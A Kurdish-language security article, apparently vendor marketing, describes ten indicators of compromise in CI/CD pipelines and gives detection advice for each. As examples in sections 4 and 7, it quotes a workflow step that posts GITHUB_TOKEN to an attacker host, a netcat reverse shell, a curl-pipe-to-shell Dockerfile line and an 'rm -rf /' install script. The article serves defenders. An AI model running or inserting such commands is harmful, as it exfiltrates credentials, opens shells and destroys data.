10 Nîşaneyên Sereke yên Lihevkirinê li CI/CD Pipelines

Pêşgotin: Nîşaneyên Lihevhatinê di Ewlekariya Sîber de Çi ne?

Nîşaneyên tawîzê nîşanên hişyariya yekem in ku pergala we an pipeline dibe ku di bin êrîşê de be. Bi gotineke hêsan, nîşaneyên lihevhatinê şopên ku ji hêla êrîşkaran ve têne hiştin in, mîna xerîb logins, guhertinên pelan, an malwareya veşartî. Di Ewlekariya sîber a IOC, ew wek şopa tiliyan li cihê sûc tevdigerin, delîlên zelal didin we ku tiştek xelet e. Ji ber vê yekê, dema ku pêşdebir dipirsin nîşanên lihevhatinê çi ne, bersiv bi server an dîwarên agir ve ne sînordar e, ew di heman demê de xetereyên veşartî yên di cîhana nûjen de jî vedihewîne. CI/CD pipelines.

Di vana de pipelines, êrîşkar dikarin bêyî ku werin dîtin kodê biguherînin, girêdayîbûnên xerab derzî bikin, an gavên avakirinê biguherînin. Lêbelê, piraniya rêbernameyan hîn jî tenê li ser server an toran disekinin. Di encamê de, zincîra dabînkirina nermalavê bûye yek ji hedefên herî hêsan.

Ji ber vê yekê ye ku nîşanên lihevhatinê di CI/CD pipelines pir girîng e. Berî her tiştî, ew alîkariya tîman dike ku malware asteng bikin, razên xwe biparêzin, û her gavek radestkirina nermalavê ewle bikin.

10 Nîşaneyên Sereke yên Lihevkirinê li CI/CD Pipelines

Dema ku nîşaneyên tawîzê têne şirovekirin, piraniya lîsteyan li ser server an toran disekinin. Lê di CI/CD pipelines, êrîşkar şopa tiliyên pir cuda dihêlin. Naskirina van sînyalan ji bo parastina proaktîf girîng e. Li jêr 10 nîşanên sor ên ewlehiya sîber ên IOC hene ku divê her pêşdebir û endezyarek ewlehiyê li wan binêre.

1. Guhertinên Gumanbar ên Girêdayîbûnê

Yek ji nîşaneyên sereke yên lihevkirinê di pipelines nûvekirinek girêdayîbûnê ya ji nişka ve û ecêb e. Êrîşkar pir caran baweriya ku pêşdebir di rêveberên pakêtan de bicîh dikin bikar tînin da ku pakêtên xeternak lê zêde bikin.

Bo nimûne, di npm a de package.json cudahî dibe ku ji nişkê ve ev tiştan di nav xwe de bigire:

+ "crypto-helper": "^1.0.2" 

Guhertinên weha dibe ku ewle xuya bikin lê dikarin koda trojanîzekirî têxin nav her avahiyê.

Tesîr: Avakirinên têkçûyî malware li çavkaniyê mîras digirin.

Servekirin: nirxandinên girêdayîbûnê bicîh bîne, cûdahiyên pelên kilîtkirî bişopîne, û pakêtên nû her dem sken bike.

2. Koda Tewşkirî di Build de 

Nivîskarên malware ji bo derbaskirina nirxandinan xwe dispêrin şaşkirinê. Di encamê de, ev nîşana tawîzê di CI/CD pipelines dikare yek ji wan pelên herî dijwar be ku meriv bigire. Bi rastî, barkirinên veşartî pir caran bêyî agahdarkirinê dikevin nav pirtûkxaneyên çavkaniya vekirî an wêneyên konteynerê.

Bo nimûne:

  • Pakêtek PyPI bi kar tîne base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Wêneyekî Dockerê ku bi dunarên UPX yên nehewce tijî ye.
  • JavaScript-a tijî \x41\x42 ji dizên nasnameyê veşartî direve.

Tesîr: Koda veşartî di dema avakirin an jî xebitandinê de bêdeng tê bicîhanîn, ku ev yek di ewlehiya sîber a IOC de dike sînyalek krîtîk.
Servekirin: Hevgirêdan SAST bi şopandina malware ji bo nîşankirina koda kodkirî an pakêtkirî. Berî her tiştî, tevlihevkirinê wekî alayek sor bihesibînin ku hêjayî lêkolînek bêtir e.

3. Nehêniyên ku di Git de hatine eşkerekirin: Rîskek Klasîk a Ewlekariya Sîber a IOC

CI/CD pipelinepir caran razên rasterast ji depoyan mîras digirin. Lêbelê, dema ku sir di Git de xuya dibin, ew dibin yek ji bersivên herî zelal ji bo pirsa "nîşaneyên lihevhatinê di çi de ne" pipelines?" Dema ku bawername li Git-ê dadikevin, êrîşkar dikarin wan bêdawî bikar bînin.

Bo nimûne:

  • A .env pelê tê de hene AWS_SECRET_KEY=.
  • Token hatin avêtin hundir config.json.
  • Tewra piştî rakirinê jî, raz hîn jî di dîroka Git de xuya dibin.

Tesîr: Bişkojkên vekirî gihîştina rasterast didin êrîşkaran CI/CD pipelines, pergalên ewr, an jî databasan. Ji ber vê yekê ev yek ji nîşaneyên herî xeternak ên tawîzê ye.
Servekirin: Bikaranîn pre-commit hooks û karên CI ji bo şopandina veşartî, û mifteyên derketî tavilê betal bikin. Wekî din, sererastkirina otomatîk bicîh bînin da ku pencereyên eşkerekirinê kêm bikin.

4. Destwerdan Pipeline Mîhengkirin: Nîşaneyên Veşartî yên Lihevkirinê

Pipeline mîheng armancên bi nirxek bilind in ji ber ku guhertinek yekane pir caran tevahiya karûbarê direvîneDi encamê de, destwerdan lê hat kirin pipeline pelên xetereyeke mezin a ewlehiya sîber a IOCê ne ku amûrên çavdêriya kevneşopî kêm kêm tespît dikin.

Bo nimûne:

  • Çalakiyên di GitHub de:

- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN
  • Di GitLab de: karekî xerabkar lê hat zêdekirin .gitlab-ci.yml ku daneyên hesas datîne.
  • Li Jenkins: sh "nc -e /bin/bash attacker.com 4444".

Tesîr: Ev guhertinên nepejirandî yên we vediguherînin pipeline veguheriye deriyekî paşîn ê daîmî ji bo êrîşkaran, ku bi eşkere wekî nîşaneyek tawîzê tê hesibandin.
Servekirin: Mîhengên îmzekirî bicîh bîne, pejirandinên PR-ê bixwaze, û li ser karên neçaverêkirî çavdêriyê bike. Wekî din, saz bike guardrails ku bixweber herikînên xebatê yên guhertî asteng dike.

5. îmtiyaz IaC Defa 

Pênaseyên binesaziyê yên şaş-mîhengkirî pir caran deriyên paşve yên veşartî diafirînin. Di encamê de, mîhengên xwerû yên îmtiyazî di IaC rîskek ewlehiya sîber a klasîk a IOC ne.

Bo nimûne:

  • Belavkirinek Kubernetes podên ku dide privileged: true.
  • Nexşeyên Helm xizmetan bi 0.0.0.0:22.

Tesîr: Êrîşkar gihîştina asta root bi dest dixin an jî xizmetên navxweyî bi eşkereyî eşkere dikin. Di encamê de, ev pirsgirêk rûbera êrîşê bi girîngî fireh dikin.
Servekirin: Bikaranîn IaC berî yekbûnê ji bo sepandina îmtiyaza herî kêm skenkirin. Wekî din, piştrast bikin ku her mîheng wekî beşek ji pipeline.

6. Reftarên Avakirinê yên Neasayî 

Êrîşkar pir caran xwe diguherînin pipeline tevgerê ji bo ku di kiryarên xerab de bişkînin. Bi gotineke din, çalakiya avakirina neasayî yek ji bersivên herî zelal e ji bo nîşanên tawîzê di CI/CD pipelines.

Bo nimûne:

  • Daxwazên tora derketinê ji bo domênên xerîb ava dike.
  • Projeyek Node.js ji nişkê ve PowerShell derdixe holê di dema... npm install.
  • Karekî CI dakêşana pelên dualî yên mezin di skrîptên avakirinê de nehatine destnîşankirin.

Tesîr: Avakirinên xirabkirî dikarin wekî xalên belavkirina malware tevbigerin. Berî her tiştî, ew barên zirardar li seranserê her bicîhkirinê belav dikin.
Servekirin: Têketinên avakirinê ji bo pêvajo an girêdanên nediyar bişopînin. Wekî din, tespîtkirina anomaliyan mîheng bikin da ku tevgerên li derveyî normê nîşan bikin.

7. Skrîptên Pakêtên Xerabkar wekî Rîskên Sîber-Ewlekariya IOC

Rêvebirên pakêtan piştgiriyê didin çerxa jiyanê hooks ku êrîşkar jê sûd werdigirin. Ji ber vê yekê, skrîptên xerabkar di npm, PyPI, an Dockerfiles de nîşaneyên bihêz ên tahrîbatê ne.

Bo nimûne:

  • npm: postinstall skrîpt dixebite rm -rf / an jî nîşan dide ji bo C2.
  • PyPI: setup.py koda Pythonê ya veşartî di dema sazkirinê de tê bicîhanîn.
  • Dockerfile: RUN curl attacker.sh | sh.

Tesîr: Êrîş di dema sazkirinê de, berî her ceribandineke xebitandinê pêk tê. Ji ber vê yekê, dibe ku pêşdebir heta ku pir dereng nebe hay jê nebin.
Servekirin: Manîfestên pakêtê ji bo skrîptên sazkirinê bişopîne. Wekî din, xetere sînordar bike hooks in CI/CD karan ji bo kêmkirina rîskê.

8. Nîşaneyên Jehrîbûna Qeyda Tomarê yên Têkçûnê

Êrîşkar tiştên di qeydan de diguherînin an jî diguherînin, û ev bûyer mînakên pirtûkên dersê ne ku nîşaneyên tawankariyê di zincîra dabînkirinê de çi ne. pipelines.

Bo nimûne:

  • Etîketeke wêneyekî Docker bi bêdengî bi çîneke trojanîzekirî hate nûve kirin.
  • Pakêtek navxweyî bi guhertoyek jehrînkirî hate guhertin.
  • daketina navên npm, wek mînak lodash-proxy.

Tesîr: Her avahîkirinek ku berhema qeydê bikar tîne dibe xetere. Ne tenê ew, lê xetere belavî karûbarên jêrîn jî dibe.
Servekirin: Kontrolên îmze û yekparebûnê li ser hemî kişandinên qeydê bicîh bînin. Wekî din, çavkaniya artefaktê bi SBOM erêkirin

9. Çalakiya Bikarhêner a Anormal wekî Delîlên IOC

Hesabên xeternak hema hema her gav şopên anormal li dû xwe dihêlin. Li gorî vê, tevgera pêşdebirên neasayî nîşaneyek bihêz a tawîzê ye.

Bo nimûne:

  • Commitsaet 3ê sibê bi dema herêmî hate destpêkirin.
  • Pejirandinên PR ji hêla hesabên di betlaneyê de.
  • Pipelines bi frekanseke neasayî tê tetikandin.

Tesîr: Êrîşkar ji bo têxistina guhertinên xerabkar agahiyên dizî bi kar tînin. Axir, bê destûr commits bi hêsanî tevlî karûbarên normal dibin.
Servekirin: Lê gûhdarkirin SCM çalakiya ji bo anomalîyan, bicîhanîna MFA-yê, û bi rêkûpêk zivirandina nîşanekan. Wekî din, li ser gumanbaran hişyar bikin commit an jî şablonên pejirandinê

10. Kontrolên yekparebûn an îmzeyê yên têkçûyî di ewlehiya sîber a IOC de

Giştî lê nayê hesibandin nîşana lihevhatinê kontrolkirina yekparebûn an îmzeyê ya têkçûyî ye. Di ewlehiya sîber a IOC de, ev kontrol piştrast dikin ku kod an berhemên orîjînal rast in. Derbaskirina wan dihêle pipelines eşkere kirin.

Nimûne:

  • Heşeke SHA256 bi kontrolkirina texmînkirî re li hev nayê.
  • Îmzeya GPG ya winda an nederbasdar.
  • An SBOM nîşankirina berhemên bêîmze.

Tesîr: Têkçûnên yekparebûnê pir caran tê wateya destwerdan, jehrîkirina qeydê, an jî derzîkirina malware.

Servekirin: Kontrolên îmzeyan otomatîk bikin, verastkirina checksum-ê bicîh bînin, û pêkhateyên bê îmze asteng bikin. Berî her tiştî, her kontroleke têkçûyî wekî delîlek eşkere ya tawankariyê bihesibînin.

CI/CD Nîşaneyên Lihevhatinê bi Kurtekî

Nîşaneya Lihevhatinê (IOC)Bandor li CI/CD PipelinesÇawa Detect
Guhertinên Gumanbar ên GirêdayîbûnêÊrîşkar pirtûkxaneyên zirardar di rêvebirên pakêtan de dişoxilînin, û dibin sedema avahiyên xeternak.Cûdahiyên pelên kilîtkirî bişopînin, nirxandinên girêdayîbûnê bicîh bînin, û girêdayîbûnan ​​bi berdewamî sken bikin.
Koda Tewşkirî di Build deBarên veşartî di dema avakirin an jî dema xebitandinê de bêyî tesbîtkirinê têne bicîhanîn.Bikaranîn SAST û malware dişopîne da ku nîşan bide ka şablonên koda base64, hex, an pakêtkirî.
Nehêniyên ku di Git de hatine eşkerekirinToken an kilîtên API yên derketine rê didin êrîşkaran ku rasterast bigihîjin pergalên krîtîk.Skenên veşartî di Git de bimeşîne hooks û nasnameyên derketî bixweber betal bike.
Destwerdan Pipeline ConfigurationsHerikînên kar ên guhertî rê didin derxistina daneyan an mayîndehiya di hundurê de CI/CD.Daxwaza pejirandinên PR, bicîhanîna mîhengên îmzekirî, û çavdêrîkirin pipeline guhertin.
Ilemtiyaz kirin IaC DefaRolên zêde destûrdar an jî mîhengên xwerû yên neewle jîngehên ewr eşkere dikin.Ji bo sepandina îmtiyazên herî kêm, pelên Terraform, Kubernetes, û Helm bişopînin.
Reftarên Avakirinê yên NeasayîPipelinewekî xalên belavkirina malware an ji bo tevgera alîgir têne bikar anîn.Tomarên avakirinê ji bo dakêşan, pêvajoyan, an bangên derketinê yên ji nişka ve analîz bikin.
Skrîptên Pakêtên XerabkarSkrîptên veşartî yên berî/piştî sazkirinê berî ceribandina dema xebitandinê barên bikêrhatî çalak dikin.Skrîptên npm/PyPI yên xeternak asteng bikin û pêkanînê sînordar bikin CI/CD kar
Jehrîbûna TomargehêBerhemên trojanîzekirî şûna wêneyên pêbawer an jî pelên dualî yên di qeydan de digirin.Kontrolên mîhengan verast bikin, pejirandina îmzeyê bicîh bînin, û qeydan bi awayekî proaktîf bişopînin.
Çalakiya Bikarhêner a AnormalHesabên xeternak malzemeyên xerab diavêjin commits an tetik pipelines.MFA bicîh bîne, çavdêrî bike commits ji bo anomalîyan, û analîz bikin login nimûne.
Kontrolên Yekparebûn an Îmzeyê yên TêkçûyîKod, girêdayîbûn, an wêneyên destwerdayî nîşan dide ku dikevin hundir pipeline.Kontrolên yekparebûnê otomatîk bikin û pêkhateyên bêîmze an nelihevhatî asteng bikin.

Çima Ewlekariya Sîber a Kevneşopî ya IOC-ê Têkçû CI/CD rîskên

Piraniya rêxistinan jixwe nîşaneyên tahrîbatê li ser server, komputer, an toran dişopînin. Lêbelê, ev rêbaza klasîk a ewlehiya sîber a IOC-ê paşguh dike. CI/CD pipelines, ku niha yek ji rûberên êrîşê yên herî krîtîk in. Bi rastî, pipelines sînyalên lihevhatinê yên bêhempa nîşan didin ku amûrên kevneşopî nikarin wan tesbît bikin.

Nîşaneyên Lihevhatinê di Ewlekariya Kevneşopî de

Di ewlehiya sîber a kevneşopî ya IOC de, balê bi gelemperî li ser van tiştan e:

  • Unusual logins an navnîşanên IP-yê ku bawernameyên dizî pêşniyar dikin.
  • Heşkirinên pelan ên gumanbar an guhertinên qeydê yên ku malware eşkere dikin.
  • Trafîka derketinê ya nediyar ku nîşan dide ku daneyan derdixe.

Ev nîşaneyên baş-naskirî ne ku di heman demê de di nav de têne şopandin jî çarçoveya MITER ATT & CK, ku tevger û taktîkên dijmin ên hevpar nîşan dide. Ev sînyalên bikêr in. Lêbelê, ew bi giranî ji bo pergalên xebitandinê an torên pargîdaniyan têne sepandin. Di encamê de, ew destwerdana nazik a ku di zincîra dabînkirina nermalavê de zûtir diqewime ji dest didin.

Çima CI/CD Pipelines Cûda ne

CI/CD pipelines jîngehên otomatîk in ku pêşdebir tê de commit kod, girêdayîbûnên kişandinê, û avahiyên berdanê. Êrîşkar dizanin ku li vir yek tawîz li ser her bicîhkirinê diherike. Li gorî vê yekê, nîşaneyên tawîzê di çi de ne? CI/CD pipelines? Ew pir cuda xuya dikin:

  • Girêdayîbûneke xerabkar bi bêdengî li package.json an requirements.txt hatiye zêdekirin.
  • Kilît an nîşaneyên API-yê yên di Git-ê de hatine eşkerekirin commitpelên s an jî .env.
  • Koda şaşbûyî di pakêtên npm an PyPI de hatiye derzîkirin.
  • Pelên Terraform an Kubernetes bi xwerûyên ne ewle yên wekî îmtiyazkirî: rast.
  • Pipeline karên ku ji bo derxistina daneyan an vekirina deriyên paşverû hatine sererastkirin.

Ev nîşanên lihevhatinê di CI/CD nedîtî bimînin standard amûrên ewlehiyê.

Valahiya di Ewlekariya Sîber a IOC de

Her çend gelek tîm nirxa nîşaneyên tawanan fêm dikin jî, ew hîn jî tenê xwe dispêrin tespîtkirina ji server û tomarên torê. Ji ber vê yekê, êrîşkar dikarin bêyî ku şopên asayî bihêlin avahiyan jehrî bikin an malware têxin nav xwe. Ji ber vê yekê bûyerên wekî deriyê paşîn ê XZ Utils an pakêtên npm yên xerabkar heya ku gihîştin hilberînê nehatin tespît kirin.

Ev celeb lihevhatinên zincîra dabînkirinê jî ji hêla ve têne ronî kirin CISRêbernameya ewlehiya zincîra dabînkirinê ya A, ku hişyarî dide ku êrîşkar bêtir hedef digirin CI/CD pipelines û qeydan.

The Takeaway

Ewlekariya sîber a kevneşopî ya IOC pêwîst e lê têrê nake. Berî her tiştî, tîm divê nîşaneyên tawîzê yên taybetî yên ji bo ... nas bikin. CI/CD pipelines. Tenê wê demê ew dikarin koda xerabkar an pipeline îstîsmar berî ku li seranserê jîngehan belav bibe.

amûrên-nermalava-berhevkirinê-ya-sca-amûran
Rîskên nermalava xwe bidin pêşanî, sererast bikin û ewle bikin
Hesabê xwe yê Belaş bistînin.
Qerta krediyê ne hewce ye.

Pêşvebirin û Radestkirina Nermalava Xwe Ewle Bike

bi Xygeni Product Suite re